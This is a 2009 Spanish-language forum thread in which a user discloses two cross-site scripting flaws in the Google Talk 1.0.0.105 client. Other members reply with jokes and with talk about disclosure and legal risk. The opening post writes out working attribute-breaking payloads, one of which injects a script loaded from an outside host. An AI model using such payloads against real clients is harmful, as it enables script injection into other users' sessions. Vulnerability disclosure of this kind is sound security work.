Foro de elhacker.net

Seguridad Informática => Nivel Web => Mensaje iniciado por: WHK en 18 Octubre 2009, 01:54 am



Título: XSS en Google Talk 1.0.0.105
Publicado por: WHK en 18 Octubre 2009, 01:54 am
Bueno, comenzé a probar en una virtual de gtalk a gtalk y me encontré con dos xss.
Por ejemplo cuando uno escribe un enlace http://<h1>test se ejecuta inmediatamente ya que el enío del string dentro de un href no se filtra y eso significa que un xss puede alojarse en el nombre de la url y el otro en la url misma como código html.

Cuando escribimos http://<h1>test en realidad se imprime esto: <a href='http://<h1>test'>http://<h1>test</a> y como se utilizan comillas simples para los tags de html podemos escapar con http://'onclick='alert(/lol/)'x=' y quedará masomenos así:
<a href='http://'onclick='alert(/lol/)'x=''>http://'onclick='alert(/lol/)'x='</a>

xDD y el resultado es algo asi como esto:

(http://www.webcomparte.com/archivos_publicos/imagenes/bugs/gtalk_xss1.png)

Conversando con SirDarckCat estubimos casi toda la noche jugando con el google talk cambiandole el fondo por una imagen de doom3, paisajes, coloreando los bordes, letras hasta que a el se le ocurrió inyectar el firebug y saber un poco mas del código fuente ya que en realidad no habia archivo temporal porque utilizaba un iframe de internet explorer 6 con la dirección about:blank haciendo document.write

(http://www.webcomparte.com/archivos_publicos/imagenes/bugs/gtalk_xss2.png)

A los que quiean inyectar el firebug pueden escribir estas dos lineas:
Citar
http://'onclick='document.body.appendChild(document.createElement("script")).src="http://getfirebug.com/releases/lite/1.2/firebug-lite-compressed.js"'x='
hacerle click y luego
Citar
http://'onclick='alert(firebug.init())'x='
y al hacerle click llamarán a firebug  :P

Está entetenido.
Para los que quieran descompilar el ejecutable del gtalk está cifrado en molebox 2.5.7 .


Título: Re: XSS en Google Talk 1.0.0.105
Publicado por: kamsky en 18 Octubre 2009, 21:35 pm
os aburris mucho,verdad¿¿   ;-) ;-) :P


Título: Re: XSS en Google Talk 1.0.0.105
Publicado por: Jubjub en 18 Octubre 2009, 21:38 pm
Grandes ;D


Título: Re: XSS en Google Talk 1.0.0.105
Publicado por: Debci en 21 Octubre 2009, 15:06 pm
que gente... se nota el tiempo libre jaja xDD
Y google no podria hacer nada al respecto? no pueden denunciaros o algo por el estilo??

Saludos


Título: Re: XSS en Google Talk 1.0.0.105
Publicado por: :ohk<any> en 21 Octubre 2009, 15:58 pm
genial ;D


Título: Re: XSS en Google Talk 1.0.0.105
Publicado por: jdc en 21 Octubre 2009, 17:53 pm
Nah.... Google regala poleras xD


Título: Re: XSS en Google Talk 1.0.0.105
Publicado por: Debci en 21 Octubre 2009, 18:20 pm
Nah.... Google regala poleras xD
enserio, si haceis este tipo de cosas peuden tomar algun tipo de carga legal contra el atacante/tester?

Saludos


Título: Re: XSS en Google Talk 1.0.0.105
Publicado por: jdc en 21 Octubre 2009, 18:39 pm
Conociendo a los descubridores... Google ya debe estar enterado y preparando una actualización xD


Título: Re: XSS en Google Talk 1.0.0.105
Publicado por: WHK en 21 Octubre 2009, 20:49 pm
google no pierde el tiempo en demandar a la gente que encuentra bugs en sus sistemas, todo lo contrario.. deben sentirse agradecidos porque hay gente que trabaja gratuitamente buscando bugs en sus sistemas para hacerlos mejores y se ahorran los auditores de código :P de hecho si nadie desvelara ningun bug de windows todavía estaríamos en la tecnologia de win 98


Título: Re: XSS en Google Talk 1.0.0.105
Publicado por: Debci en 21 Octubre 2009, 22:05 pm
google no pierde el tiempo en demandar a la gente que encuentra bugs en sus sistemas, todo lo contrario.. deben sentirse agradecidos porque hay gente que trabaja gratuitamente buscando bugs en sus sistemas para hacerlos mejores y se ahorran los auditores de código :P de hecho si nadie desvelara ningun bug de windows todavía estaríamos en la tecnologia de win 98
jaja ok xD

Saludos


Título: Re: XSS en Google Talk 1.0.0.105
Publicado por: sirdarckcat en 22 Octubre 2009, 03:39 am
Citar
Conversando con SirDarckCat estubimos casi toda la noche jugando con el google talk
para mi era medio dia.. XDDD


Título: Re: XSS en Google Talk 1.0.0.105
Publicado por: Zero_Bits en 22 Octubre 2009, 03:49 am
Gran descubrimiento..
Que descuido de google xDDD
Saludos..


Título: Re: XSS en Google Talk 1.0.0.105
Publicado por: OtroVientoMejor en 22 Octubre 2009, 05:50 am
jajaja lo que es el ocio :P

en las salas de chat de www.tagged.com yo hacia lo mismo
jaja hasta que alguien más se dio cuenta, le aviso a Alex y lo remodelaron todo desde 0, ya nada quedo igual  :-[


Título: Re: XSS en Google Talk 1.0.0.105
Publicado por: дٳŦ٭ en 28 Octubre 2009, 00:17 am
jajaja par de ociosos xDDD

Congrat!


Título: Re: XSS en Google Talk 1.0.0.105
Publicado por: Skeletron en 1 Noviembre 2009, 02:35 am
Que grande los chicos!